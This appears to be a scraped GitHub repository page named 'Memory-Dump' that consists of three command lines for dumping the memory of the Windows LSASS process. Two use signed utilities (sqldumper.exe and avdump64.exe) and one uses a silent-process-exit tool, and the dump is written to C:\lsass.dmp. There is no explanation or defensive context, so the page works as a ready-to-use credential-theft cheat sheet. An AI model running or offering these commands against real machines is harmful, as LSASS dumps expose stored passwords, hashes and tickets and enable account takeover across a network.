Ares-X / Memory-Dump

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Memory-Dump

sqldumper.exe <lsass PID> 0 0x01100

.\avdump64.exe --pid <pid> --exception_ptr 0 --thread_id 0 --dump_level 1 --dump_file C:\lsass.dmp
LsassSilentProcessExit.exe <pid> 0

About